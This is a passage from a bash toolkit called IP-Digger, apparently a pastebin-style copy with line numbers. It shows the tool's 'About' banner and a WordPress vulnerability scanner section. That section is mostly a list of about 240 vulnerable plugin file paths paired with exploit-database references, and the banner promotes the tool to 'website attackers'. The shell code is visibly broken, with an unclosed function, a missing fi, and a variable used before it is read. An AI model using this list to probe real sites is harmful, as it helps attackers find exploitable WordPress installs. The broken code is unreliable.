  1211. echo "--------------------------------------------------------------------------------------------------------------------------------"
  1212. echo
  1213. echo
  1214. read -p "Press Enter to Continue :-)"
  1215. }
  1216. #ABout IP-Digger
  1217. if [ "$mychoice" = "99" ]; then
  1218. {
  1219. echo "-------------------------------------------------------------------------------------------------------------------------------"
  1220. echo " | "
  1221. echo " |IP-Digger v 4.0 - "
  1222. echo " |=-=-=-=-=-- :- "
  1223. echo " | "
  1224. echo -e " |\e[1;31m This tool has been coded by Gurender Singh and Manoj Nath. \e[0m "
  1225. echo -e " |\e[1;31m This tool is for the Web pentestors or Security experts for pentesting the websites\e[0m"
  1226. echo -e " |\e[1;31m This tool is the best tool for the website attackers or the Web Security Expert "
  1227. echo -e "\e[1;31m This version has serveral new features added to the IP-DiggEr \e[0m "
  1228. echo " | "
  1229.  
  1230. echo "------------------------------------------------------"
  1231. echo
  1232. read -p "Press Enter to Continue"
  1233. }
  1234. #Wordpress vulnerability scanner
  1235. if [ "$mychoice" = "20" ]; then
  1236. #Basic operators
  1237. TIME="0" # sleep time among each request
  1238. CURL="/usr/bin/curl"
  1239. GREP="/bin/grep"
  1240. CUT="/usr/bin/cut"
  1241. LOGFILE="IP-Digger_Wordpress_scan$(date +%d-%b-%Y_%H%M)"
  1242. #colors attribute
  1243. RED="\e[1;31m"
  1244. YELLOW="\e[1;33m"
  1245. GREEN="\e[1;32m"
  1246. BLUE="\e[1;34m"
  1247. NO="\e[0m"
  1248. STRXPL="$GREEN[+] EXPLOIT:$RED"
  1249. #FIREFOX BROWSER BANNER
  1250. BANNER="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.4; .NET CLR 1.1.4322; FDM; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
  1251. #Error report
  1252. get_error() {
  1253. echo -e "\n\tBlank Input\n"
  1254. exit 1
  1255. #Main variables
  1256. VICTIM=$web
  1257. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  1258. echo " Tool Name :- IP DiggEr ( Wordpress Vulnerability Scanner )"
  1259. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  1260. echo -e " <^> ---------------------------------- <^> \e[0m"
  1261. echo
  1262. echo -e "\e[1;32m This tool helps you to scan the Wordpress site and scans for the vulnerability \e[0m"
  1263. echo
  1264. read -p "[+] Enter Wordpress website ( For Example :- http://www.target.com/ ) :- " web
  1265. #Error
  1266. if [ -z "$web" ]; then
  1267. get_error
  1268. #Wordpress Vulnerable Plugins
  1269. vulns[0]="wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php"
  1270. vulns[1]="wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php"
  1271. vulns[2]="wp-admin/edit-tags.php"
  1272. vulns[3]="wp-admin/link-manager.php"
  1273. vulns[4]="wp-content/plugins/wptouch/wptouch.php"
  1274. vulns[5]="wp-content/plugins/is-human/engine.php"
  1275. vulns[6]="wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html"
  1276. vulns[7]="wp-content/plugins/sermon-browser/sermon.php"
  1277. vulns[8]="wp-content/plugins/backwpup/wp_xml_export.php"
  1278. vulns[9]="wp-content/plugins/flash-album-gallery/lib/hitcounter.php"
  1279. vulns[10]="wp-content/plugins/wp-custom-pages/wp-download.php"
  1280. vulns[11]="wp-content/plugins/old-post-spinner/logview.php"
  1281. vulns[12]="wp-content/plugins/jquery-mega-menu/skin.php"
  1282. vulns[13]="wp-content/plugins/iwant-one-ihave-one/updateAJAX.php"
  1283. vulns[14]="wp-content/plugins/forum-server/feed.php"
  1284. vulns[15]="wp-content/plugins/relevanssi/relevanssi.php"
  1285. vulns[16]="wp-content/plugins/gigpress/gigpress.php"
  1286. vulns[17]="wp-content/plugins/comment-rating/comment-rating-options.php"
  1287. vulns[18]="wp-content/plugins/zvote/zvote.php"
  1288. vulns[19]="wp-content/plugins/user-photo/user-photo.php"
  1289. vulns[20]="wp-content/plugins/enable-media-replace/upload.php"
  1290. vulns[21]="wp-content/plugins/mingle-forum/feed.php"
  1291. vulns[22]="wp-admin/post.php"
  1292. vulns[23]="wp-content/plugins/accept-signups/accept-signups_submit.php"
  1293. vulns[24]="wp-includes/comment.php"
  1294. vulns[25]="wp-content/plugins/event-registration/event_regis.php"
  1295. vulns[26]="wp-content/plugins/events-manager-extended/events-manager.php"
  1296. vulns[27]="wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php"
  1297. vulns[28]="wp-content/plugins/firestats/php/tools/get_config.php"
  1298. vulns[29]="myLDlinker.php"
  1299. vulns[30]="wp-content/plugins/simple-forum/sf-header-forum.php"
  1300. vulns[31]="wp-content/plugins/cimy-counter/cimy_counter.php"
  1301. vulns[32]="wp-content/plugins/nextgen-gallery/nggallery.php"
  1302. vulns[33]="wp-content/plugins/cpl/cplphoto.php"
  1303. vulns[34]="wp-content/plugins/events-calendar/events-calendar.php"
  1304. vulns[35]="wp-content/plugins/pyrmont-v2/index.php"
  1305. vulns[36]="wp-content/plugins/ImageManager/manager.php"
  1306. vulns[37]="wp-content/plugins/wp-cumulus/wp-cumulus.php"
  1307. vulns[38]="wp-includes/wpmu-functions.php"
  1308. vulns[39]="wp-content/plugins/wp-syntax/test/index.php"
  1309. vulns[40]="wp-content/plugins/my-category-order/mycategoryorder.php"
  1310. vulns[41]="wp-content/plugins/related-sites/BTE_RW_webajax.php"
  1311. vulns[42]="wp-content/plugins/dm-albums/dm-albums.php"
  1312. vulns[43]="wp-content/plugins/dm-albums/template/album.php"
  1313. vulns[44]="wp-content/plugins/photoracer/viewimg.php"
  1314. vulns[45]="wp-content/plugins/wp-lytebox/main.php"
  1315. vulns[46]="wp-content/plugins/fmoblog.php"
  1316. vulns[47]="wp-content/plugins/wp-forum/forum_feed.php"
  1317. vulns[48]="wp-content/plugins/page-flip-image-gallery/books/getConfig.php"
  1318. vulns[49]="wp-content/plugins/wp-shopping-cart/image_processing.php"
  1319. vulns[50]="mediaHolder.php"
  1320. vulns[51]="wp-content/plugins/st_newsletter/stnl_iframe.php"
  1321. vulns[52]="wp-content/plugins/downloads-manager/upload.php"
  1322. vulns[53]="wp-content/plugins/wpSS/ss_load.php"
  1323. vulns[54]="wp-content/plugins/wp-download/wp-download.php"
  1324. vulns[55]="wp-content/plugins/sniplets/modules/syntax_highlight.php"
  1325. vulns[56]="wp-content/plugins/wp-photo-album/wppa.php"
  1326. vulns[57]="wp-content/plugins/simple-forum/sf-includes.php"
  1327. vulns[58]="wp-content/plugins/simple-forum/sf-includes.php"
  1328. vulns[59]="wp-content/plugins/st_newsletter/shiftthis-preview.php"
  1329. vulns[60]="wp-content/plugins/wordspew/wordspew-rss.php"
  1330. vulns[61]="wp-content/plugins/dmsguestbook/dmsguestbook.php"
  1331. vulns[62]="wp-content/plugins/wassup/spy.php"
  1332. vulns[63]="wp-content/plugins/wp-adserve/adclick.php"
  1333. vulns[64]="wp-content/plugins/fgallery/fim_rss.php"
  1334. vulns[65]="wp-content/plugins/wp-cal/functions/editevent.php"
  1335. vulns[66]="wp-content/plugins/wp-forum/wp-forum.php"
  1336. vulns[67]="wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php"
  1337. vulns[68]="wp-content/plugins/pictpress/resize.php"
  1338. vulns[69]="wp-content/plugins/BackUp/Archive.php"
  1339. vulns[70]="wp-content/plugins/myflash/myflash-button.php"
  1340. vulns[71]="wp-content/plugins/wordtube/wordtube-button.php"
  1341. vulns[72]="wp-content/plugins/wp-table/js/wptable-button.php"
  1342. vulns[73]="wp-content/plugins/mygallery/mygallery.php"
  1343. vulns[74]="wp-content/plugins/Enigma2.php"
  1344. vulns[75]="wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html"
  1345. vulns[76]="wp-content/themes/THEME/timthumb.php"
  1346. vulns[77]="wp-content/plugins/wp-e-commerce/wpsc-theme/functions/wpsc-user_log_functions.php"
  1347. vulns[78]="wp-content/plugins/ungallery/source_vuln.php"
  1348. vulns[79]="wp-content/plugins/wp-menu-creator/updateSortOrder.php"
  1349. vulns[80]="wp-content/plugins/mm-duplicate/mm-duplicate.php"
  1350. vulns[81]="wp-content/plugins/sendit/submit.php"
  1351. vulns[82]="wp-content/plugins/photoracer/viewimg.php"
  1352. vulns[83]="wp-content/plugins/easy-comment-uploads/upload-form.php"
  1353. vulns[84]="wp-content/plugins/allow-php-in-posts-and-pages/alter.php"
  1354. vulns[85]="wp-content/plugins/ajaxgallery/utils/list.php"
  1355. vulns[86]="wp-content/plugins/wpforum/sendmail.php"
  1356. vulns[87]="wp-content/plugins/wp-ds-faq/ajax.php"
  1357. vulns[88]="wp-content/plugins/easy-contact-form-lite/requests/sort_row.request.php"
  1358. vulns[89]="wp-content/plugins/wp-symposium/uploadify/get_profile_avatar.php"
  1359. vulns[90]="wp-content/plugins/contus-hd-flv-player/process-sortable.php"
  1360. vulns[91]="wp-content/plugins/file-groups/download.php"
  1361. vulns[92]="wp-content/plugins/wp-css/wp-css-compress.php"
  1362. vulns[93]="wp-content/plugins/mm-forms-community/includes/edit_details.php"
  1363. vulns[94]="wp-content/plugins/js-appointment/searchdata.php"
  1364. vulns[95]="wp-content/plugins/oqey-headers/oqey_settings.php"
  1365. vulns[96]="wp-content/plugins/fbpromotions/fbActivate.php"
  1366. vulns[97]="wp-content/plugins/profiles/library/bio-img.php"
  1367. vulns[98]="wp-content/plugins/evarisk/include/ajax.php"
  1368. vulns[99]="wp-content/plugins/mystat/mystat.php"
  1369. vulns[100]="wp-content/plugins/sh-slideshow/ajax.php"
  1370. vulns[101]="wp-content/plugins/copyright-licensing-tools/icopyright_xml.php"
  1371. vulns[102]="wp-content/plugins/advertizer/click_ads.php"
  1372. vulns[103]="wp-content/plugins/event-registration/event_registration_export.php"
  1373. vulns[104]="wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php"
  1374. vulns[105]="wp-content/plugins/wp-audio-gallery-playlist/playlist.php"
  1375. vulns[106]="wp-content/plugins/yolink-search/includes/bulkcrawl.php"
  1376. vulns[107]="wp-content/plugins/pure-html/alter.php"
  1377. vulns[108]="wp-content/plugins/couponer/print-coupon.php"
  1378. vulns[109]="wp-content/plugins/grapefile/grapeupload.php"
  1379. vulns[110]="wp-content/plugins/image-gallery-with-slideshow/upload-file.php"
  1380. vulns[111]="wp-content/plugins/wordpress-donation-plugin-with-goals-and-paypal-ipn-by-nonprofitcmsorg/exporttocsv.php"
  1381. vulns[112]="wp-content/plugins/wp-bannerize/ajax_clickcounter.php"
  1382. vulns[113]="wp-content/plugins/search-autocomplete/includes/tags.php"
  1383. vulns[114]="wp-content/plugins/videowhisper-video-presentation/vp/c_status.php"
  1384. vulns[115]="wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php"
  1385. vulns[116]="wp-content/plugins/zotpress/zotpress.rss.php"
  1386. vulns[117]="wp-content/plugins/oqey-gallery/getimages.php"
  1387. vulns[118]="wp-content/plugins/tweet-old-post/tweet-old-post.php"
  1388. vulns[119]="wp-content/plugins/post-highlights/ajax/ph_settings.php"
  1389. vulns[120]="wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php"
  1390. vulns[121]="wp-content/plugins/scormcloud/ajax.php"
  1391. vulns[122]="wp-content/plugins/eventify/php/ajax/fetcheventdetails.php"
  1392. vulns[123]="wp-content/plugins/paid-downloads/download.php"
  1393. vulns[124]="wp-content/plugins/community-events/tracker.php"
  1394. vulns[125]="wp-content/plugins/1-flash-gallery/upload.php"
  1395. vulns[126]="wp-content/plugins/wp-filebase/wpfb-ajax.php"
  1396. vulns[127]="wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php"
  1397. vulns[128]="wp-content/plugins/events-2/"
  1398. vulns[129]="wp-content/plugins/tune-library/tune-library-ajax.php"
  1399. vulns[130]="wp-content/plugins/forum-server/wpf-insert.php"
  1400. vulns[131]="wp-content/plugins/wp-e-commerce/wp-shopping-cart.php"
  1401. vulns[132]="wp-content/plugins/count-per-day/notes.php"
  1402. vulns[133]="wp-content/plugins/filedownload/download.php"
  1403. vulns[134]="wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"
  1404. vulns[135]="wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php"
  1405. vulns[136]="wp-content/plugins/wpeasystats/export.php"
  1406. vulns[137]="wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"
  1407. vulns[138]="wp-content/plugins/livesig/livesig-ajax-backend.php"
  1408. vulns[139]="wp-content/plugins/disclosure-policy-plugin/functions/action.php"
  1409. vulns[140]="wp-content/plugins/mailz/lists/config/config.php"
  1410. vulns[141]="wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php"
  1411. vulns[142]="wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"
  1412. vulns[143]="wp-content/plugins/relocate-upload/relocate-upload.php"
  1413. vulns[144]="wp-content/plugins/category-grid-view-gallery/includes/timthumb.php"
  1414. vulns[145]="wp-content/plugins/auto-attachments/thumb.php"
  1415. vulns[146]="wp-content/plugins/wp-marketplace/libs/timthumb.php"
  1416. vulns[147]="wp-content/plugins/dp-thumbnail/timthumb/timthumb.php"
  1417. vulns[148]="wp-content/plugins/vk-gallery/lib/timthumb.php"
  1418. vulns[149]="wp-content/plugins/rekt-slideshow/picsize.php"
  1419. vulns[150]="wp-content/plugins/cac-featured-content/timthumb.php"
  1420. vulns[151]="wp-content/plugins/rent-a-car/libs/timthumb.php"
  1421. vulns[152]="wp-content/plugins/lisl-last-image-slider/timthumb.php"
  1422. vulns[153]="wp-content/plugins/islidex/js/timthumb.php"
  1423. vulns[154]="wp-content/plugins/kino-gallery/timthumb.php"
  1424. vulns[155]="wp-content/plugins/cms-pack/timthumb.php"
  1425. vulns[156]="wp-content/plugins/a-gallery/timthumb.php"
  1426. vulns[157]="wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php"
  1427. vulns[158]="wp-content/plugins/really-easy-slider/inc/thumb.php"
  1428. vulns[159]="wp-content/plugins/verve-meta-boxes/tools/timthumb.php"
  1429. vulns[160]="wp-content/plugins/user-avatar/user-avatar-pic.php"
  1430. vulns[161]="wp-content/plugins/extend-wordpress/helpers/timthumb/image.php"
  1431. vulns[162]="wp-content/plugins/link-library/link-library-ajax.php"
  1432. vulns[163]="wp-content/plugins/adrotate/adrotate-out.php"
  1433. vulns[164]="wp-content/plugins/cevhershare/cevhershare-admin.php"
  1434. vulns[165]="wp-content/plugins/mingle-forum/wpf-insert.php"
  1435. vulns[166]="wp-content/plugins/wp-bannerize/ajax_sorter.php"
  1436. vulns[167]="wp-content/plugins/wp-spamfree/js/wpsf-js.php"
  1437. vulns[168]="wp-content/plugins/gd-star-rating/export.php"
  1438. vulns[169]="wp-content/plugins/contact-form-wordpress/easy-form.class.php"
  1439. vulns[170]="wp-content/plugins/wp-photo-album-plus/wppa-functions.php"
  1440. vulns[171]="wp-content/plugins/backwpup/job/wp_export_generate.php"
  1441. vulns[172]="wp-content/themes/classipress/index.php"
  1442. vulns[173]="wp-content/plugins/wp-glossary/ajax.php"
  1443. vulns[174]="wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php"
  1444. vulns[175]="wp-content/plugins/adrotate/adrotate-out.php"
  1445. vulns[176]="wp-content/plugins/jetpack/modules/sharedaddy.php"
  1446. vulns[177]="wp-content/plugins/universal-post-manager/bycat.php"
  1447. vulns[178]="wp-content/plugins/mailz/lists/dl.php"
  1448. vulns[179]="wp-content/plugins/pay-with-tweet.php/pay.php"
  1449. vulns[180]="wp-content/plugins/age-verification/age-verification.php"
  1450. vulns[181]="wp-content/plugins/wp-autoyoutube/modules/index.php"
  1451. vulns[182]="wp-content/plugins/count-per-day/download.php"
  1452. vulns[183]="wp-content/plugins/ucan-post/"
  1453. vulns[184]="wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php"
  1454. vulns[185]="wp-content/plugins/zingiri-web-shop/zing.inc.php"
  1455. vulns[186]="wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
  1456. vulns[187]="wp-content/plugins/wpmarketplace/uploadify/uploadify.php"
  1457. vulns[188]="wp-content/plugins/store-locator-le/core/load_wp_config.php"
  1458. vulns[189]="wp-content/plugins/html5avmanager/lib/uploadify/custom.php"
  1459. vulns[190]="wp-content/plugins/foxypress/uploadify/uploadify.php"
  1460. vulns[191]="wp-content/plugins/asset-manager/upload.php"
  1461. vulns[192]="wp-content/plugins/font-uploader/font-upload.php"
  1462. vulns[193]="wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php"
  1463. vulns[194]="wp-content/plugins/gallery-plugin/upload/php.php"
  1464. vulns[195]="wp-content/plugins/front-end-upload/upload.php"
  1465. vulns[196]="wp-content/plugins/omni-secure-files/plupload/examples/upload.php"
  1466. vulns[197]="wp-content/plugins/wpstorecart/php/upload.php"
  1467. vulns[198]="wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"
  1468. vulns[199]="wp-content/plugins/thinkun-remind/exportData.php"
  1469. vulns[200]="wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"
  1470. vulns[201]="wp-content/plugins/rbxgallery/uploader.php"
  1471. vulns[202]="wp-content/plugins/plugin-newsletter/preview.php"
  1472. vulns[203]="wp-content/plugins/pica-photo-gallery/picadownload.php"
  1473. vulns[204]="wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php"
  1474. vulns[205]="wp-content/plugins/front-file-manager/upload.php"
  1475. vulns[206]="wp-content/plugins/content-flow3d/"
  1476. vulns[207]="wp-content/plugins/custom-content-type-manager/upload_form.php"
  1477. vulns[208]="wp-content/plugins/drag-drop-file-uploader/dnd-upload.php"
  1478. vulns[209]="wp-content/plugins/mac-dock-gallery/upload-file.php"
  1479. vulns[210]="wp-content/plugins/pica-photo-gallery/picaPhotosResize.php"
  1480. vulns[211]="wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php"
  1481. vulns[212]="wp-content/plugins/topquark/lib/js/fancyupload/showcase/batch/script.php"
  1482. vulns[213]="wp-content/plugins/user-meta/framework/helper/uploader.php"
  1483. vulns[214]="wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php"
  1484. vulns[215]="wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html"
  1485. vulns[216]="wp-content/plugins/buddypress/bp-loader.php"
  1486. vulns[217]="wp-content/plugins/mowpop/submit.php"
  1487. vulns[218]="wp-content/plugins/taggator/taggator.php"
  1488. vulns[219]="wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html"
  1489. vulns[220]="advanced-search.php"
  1490. vulns[221]="wp-content/plugins/email-before-download/email-before-download.php"
  1491. vulns[222]="wp-content/themes/3dcubes/index.php"
  1492. vulns[223]="wp-content/plugins/HT-Poi/file_upload.php"
  1493. vulns[224]="wp-content/plugins/wp-easy-gallery/wp-easy-gallery.php"
  1494. vulns[225]="wp-content/plugins/imagedrop/ImageDrop.php"
  1495. vulns[226]="wp-content/plugins/ss-downloads/services/getfile.php"
  1496. vulns[227]="wp-content/plugins/custom-background/uploadify/uploadify.php"
  1497. vulns[228]="wp-content/plugins/placester/js/uploadify/uploadify.php"
  1498. vulns[229]="wp-content/themes/photocrati-theme/admin/upload_edit.php"
  1499. vulns[230]="wp-content/plugins/katalyst-timthumb/timthumb.php"
  1500. vulns[231]="wp-content/plugins/wp-automatic/inc/csv.php"
  1501. vulns[232]="wp-content/plugins/arcadepress/php/upload.php"
  1502. vulns[233]="wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php"
  1503. vulns[234]="wp-content/plugins/wp-imagezoom/download.php"
  1504. vulns[235]="wp-content/plugins/lim4wp/includes/upload.php"
  1505. vulns[236]="wp-content/themes/famous/megaframe/megapanel/inc/upload.php"
  1506. vulns[237]="wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php"
  1507. vulns[238]="wp-content/plugins/organizer/page/users.php"
  1508. vulns[239]="wp-content/plugins/super-capcha/super-capcha.php"
  1509. vulns[240]="wp-content/plugins/testimonials/testimonials.php"
  1510. vulns[241]="wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html"
  1511. vulns[242]="wp-content/plugins/media-library-categories/sort.php"
  1512. # Wordpress Plugins Reference
  1513. ref[0]="http://www.exploit-db.com/exploits/17207/"
  1514. ref[1]="http://www.exploit-db.com/exploits/16273/"
  1515. ref[2]="http://www.exploit-db.com/exploits/17465/"
  1516. ref[3]="http://www.exploit-db.com/exploits/17465/"
  1517. ref[4]="http://www.exploit-db.com/exploits/17423/ : http://www.exploit-db.com/exploits/18039/"
  1518. ref[5]="http://www.exploit-db.com/exploits/17299/"
  1519. ref[6]="http://www.exploit-db.com/exploits/17284/"
  1520. ref[7]="http://www.exploit-db.com/exploits/17214/"
  1521. ref[8]="http://www.exploit-db.com/exploits/17056/"
  1522. ref[9]="http://www.exploit-db.com/exploits/16947/"
  1523. ref[10]="http://www.exploit-db.com/exploits/17119/"
  1524. ref[11]="http://www.exploit-db.com/exploits/16251/"
  1525. ref[12]="http://www.exploit-db.com/exploits/16250/"
  1526. ref[13]="http://www.exploit-db.com/exploits/16236/"
  1527. ref[14]="http://www.exploit-db.com/exploits/16235/"
  1528. ref[15]="http://www.exploit-db.com/exploits/16233/"
  1529. ref[16]="http://www.exploit-db.com/exploits/16232/"
  1530. ref[17]="http://www.exploit-db.com/exploits/16221/"
  1531. ref[18]="http://www.exploit-db.com/exploits/16218/"
  1532. ref[19]="http://www.exploit-db.com/exploits/16181/"
  1533. ref[20]="http://www.exploit-db.com/exploits/16144/"
  1534. ref[21]="http://www.exploit-db.com/exploits/15943/ : http://www.1337day.com/exploits/17826"
  1535. ref[22]="http://www.exploit-db.com/exploits/15858/"
  1536. ref[23]="http://www.exploit-db.com/exploits/15808/"
  1537. ref[24]="http://www.exploit-db.com/exploits/15684/"
  1538. ref[25]="http://www.exploit-db.com/exploits/15513/"
  1539. ref[26]="http://www.exploit-db.com/exploits/14923/"
  1540. ref[27]="http://www.exploit-db.com/exploits/14541/"
  1541. ref[28]="http://www.exploit-db.com/exploits/14308/"
  1542. ref[29]="http://www.exploit-db.com/exploits/14441/"
  1543. ref[30]="http://www.exploit-db.com/exploits/14198/"
  1544. ref[31]="http://www.exploit-db.com/exploits/14057/"
  1545. ref[32]="http://www.exploit-db.com/exploits/12098/"
  1546. ref[33]="http://www.exploit-db.com/exploits/11458/"
  1547. ref[34]="http://www.exploit-db.com/exploits/10929/"
  1548. ref[35]="http://www.exploit-db.com/exploits/10535/"
  1549. ref[36]="http://www.exploit-db.com/exploits/10325/"
  1550. ref[37]="http://www.exploit-db.com/exploits/10228/"
  1551. ref[38]="http://www.exploit-db.com/exploits/10090/"
  1552. ref[39]="http://www.exploit-db.com/exploits/9431/"
  1553. ref[40]="http://www.exploit-db.com/exploits/9150/"
  1554. ref[41]="http://www.exploit-db.com/exploits/9054/"
  1555. ref[42]="http://www.exploit-db.com/exploits/9048/"
  1556. ref[43]="http://www.exploit-db.com/exploits/9043/"
  1557. ref[44]="http://www.exploit-db.com/exploits/8961/"
  1558. ref[45]="http://www.exploit-db.com/exploits/8791/"
  1559. ref[46]="http://www.exploit-db.com/exploits/8229/"
  1560. ref[47]="http://www.exploit-db.com/exploits/7738/"
  1561. ref[48]="http://www.exploit-db.com/exploits/7543/"
  1562. ref[49]="http://www.exploit-db.com/exploits/6867/"
  1563. ref[50]="http://www.exploit-db.com/exploits/6842/"
  1564. ref[51]="http://www.exploit-db.com/exploits/6777/"
  1565. ref[52]="http://www.exploit-db.com/exploits/6127/"
  1566. ref[53]="http://www.exploit-db.com/exploits/5486/"
  1567. ref[54]="http://www.exploit-db.com/exploits/5326/"
  1568. ref[55]="http://www.exploit-db.com/exploits/5194/"
  1569. ref[56]="http://www.exploit-db.com/exploits/5135/"
  1570. ref[57]="http://www.exploit-db.com/exploits/5126/"
  1571. ref[58]="http://www.exploit-db.com/exploits/5127/"
  1572. ref[59]="http://www.exploit-db.com/exploits/5053/"
  1573. ref[60]="http://www.exploit-db.com/exploits/5039/"
  1574. ref[61]="http://www.exploit-db.com/exploits/5035/"
  1575. ref[62]="http://www.exploit-db.com/exploits/5017/"
  1576. ref[63]="http://www.exploit-db.com/exploits/5013/"
  1577. ref[64]="http://www.exploit-db.com/exploits/4993/"
  1578. ref[65]="http://www.exploit-db.com/exploits/4992/"
  1579. ref[66]="http://www.exploit-db.com/exploits/4939/"
  1580. ref[67]="http://www.exploit-db.com/exploits/4844/"
  1581. ref[68]="http://www.exploit-db.com/exploits/4695/"
  1582. ref[69]="http://www.exploit-db.com/exploits/4593/"
  1583. ref[70]="http://www.exploit-db.com/exploits/3828/"
  1584. ref[71]="http://www.exploit-db.com/exploits/3825/"
  1585. ref[72]="http://www.exploit-db.com/exploits/3824/"
  1586. ref[73]="http://www.exploit-db.com/exploits/3814/"
  1587. ref[74]="http://www.exploit-db.com/exploits/3051/"
  1588. ref[75]="http://www.1337day.com/exploits/16488"
  1589. ref[76]="http://www.exploit-db.com/exploits/17602/"
  1590. ref[77]="http://www.exploit-db.com/exploits/17613/ : http://packetstormsecurity.org/files/view/103724/wpecommerce-xss.txt"
  1591. ref[78]="http://www.exploit-db.com/exploits/17704/"
  1592. ref[79]="http://www.exploit-db.com/exploits/17689/"
  1593. ref[80]="http://www.exploit-db.com/exploits/17707/"
  1594. ref[81]="http://www.exploit-db.com/exploits/17716/"
  1595. ref[82]="http://www.exploit-db.com/exploits/17720/ : http://www.exploit-db.com/exploits/17731/"
  1596. ref[83]="http://www.1337day.com/exploits/16720"
  1597. ref[84]="http://www.1337day.com/exploits/16718"
  1598. ref[85]="http://www.1337day.com/exploits/16716"
  1599. ref[86]="http://www.1337day.com/exploits/16711"
  1600. ref[87]="http://www.1337day.com/exploits/16710"
  1601. ref[88]="http://www.1337day.com/exploits/16708"
  1602. ref[89]="http://www.1337day.com/exploits/16707 : http://www.1337day.com/exploits/18565"
  1603. ref[90]="http://www.1337day.com/exploits/16706"
  1604. ref[91]="http://www.1337day.com/exploits/16705"
  1605. ref[92]="http://www.1337day.com/exploits/16756"
  1606. ref[93]="http://www.exploit-db.com/exploits/17725/"
  1607. ref[94]="http://www.exploit-db.com/exploits/17724/"
  1608. ref[95]="http://www.exploit-db.com/exploits/17730/"
  1609. ref[96]="http://www.exploit-db.com/exploits/17737/"
  1610. ref[97]="http://www.exploit-db.com/exploits/17739/"
  1611. ref[98]="http://www.exploit-db.com/exploits/17738/"
  1612. ref[99]="http://www.exploit-db.com/exploits/17740/"
  1613. ref[100]="http://www.exploit-db.com/exploits/17748/"
  1614. ref[101]="http://www.exploit-db.com/exploits/17749/"
  1615. ref[102]="http://www.exploit-db.com/exploits/17750/"
  1616. ref[103]="http://www.exploit-db.com/exploits/17751/"
  1617. ref[104]="http://www.exploit-db.com/exploits/17755/"
  1618. ref[105]="http://www.exploit-db.com/exploits/17756/"
  1619. ref[106]="http://www.exploit-db.com/exploits/17757/"
  1620. ref[107]="http://www.exploit-db.com/exploits/17758/"
  1621. ref[108]="http://www.exploit-db.com/exploits/17759/"
  1622. ref[109]="http://www.exploit-db.com/exploits/17760/"
  1623. ref[110]="http://www.exploit-db.com/exploits/17761/"
  1624. ref[111]="http://www.exploit-db.com/exploits/17763/"
  1625. ref[112]="http://www.exploit-db.com/exploits/17764/"
  1626. ref[113]="http://www.exploit-db.com/exploits/17767/"
  1627. ref[114]="http://www.exploit-db.com/exploits/17771/"
  1628. ref[115]="http://www.exploit-db.com/exploits/17773/"
  1629. ref[116]="http://www.exploit-db.com/exploits/17778/"
  1630. ref[117]="http://www.exploit-db.com/exploits/17779/"
  1631. ref[118]="http://www.exploit-db.com/exploits/17789/"
  1632. ref[119]="http://www.exploit-db.com/exploits/17790/"
  1633. ref[120]="http://www.exploit-db.com/exploits/17791/"
  1634. ref[121]="http://www.exploit-db.com/exploits/17793/"
  1635. ref[122]="http://www.exploit-db.com/exploits/17794/"
  1636. ref[123]="http://www.exploit-db.com/exploits/17797/"
  1637. ref[124]="http://www.exploit-db.com/exploits/17798/"
  1638. ref[125]="http://www.exploit-db.com/exploits/17801/"
  1639. ref[126]="http://www.exploit-db.com/exploits/17808/"
  1640. ref[127]="http://www.exploit-db.com/exploits/17809/"
  1641. ref[128]="http://www.exploit-db.com/exploits/17814/"
  1642. ref[129]="http://www.exploit-db.com/exploits/17816/"
  1643. ref[130]="http://www.exploit-db.com/exploits/17828/"
  1644. ref[131]="http://www.exploit-db.com/exploits/17832/"
  1645. ref[132]="http://www.exploit-db.com/exploits/17857/"
  1646. ref[133]="http://www.exploit-db.com/exploits/17858/"
  1647. ref[134]="http://www.exploit-db.com/exploits/17860/ : http://www.1337day.com/exploits/18018"
  1648. ref[135]="http://www.exploit-db.com/exploits/17861/"
  1649. ref[136]="http://www.exploit-db.com/exploits/17862/"
  1650. ref[137]="http://www.exploit-db.com/exploits/17863/"
  1651. ref[138]="http://www.exploit-db.com/exploits/17864/"
  1652. ref[139]="http://www.exploit-db.com/exploits/17865/"
  1653. ref[140]="http://www.exploit-db.com/exploits/17866/"
  1654. ref[141]="http://www.exploit-db.com/exploits/17867/ : http://www.1337day.com/exploits/18015"
  1655. ref[142]="http://www.exploit-db.com/exploits/17868/"
  1656. ref[143]="http://www.exploit-db.com/exploits/17869/"
  1657. ref[144]="http://www.exploit-db.com/exploits/17872/"
  1658. ref[145]="http://www.exploit-db.com/exploits/17872/"
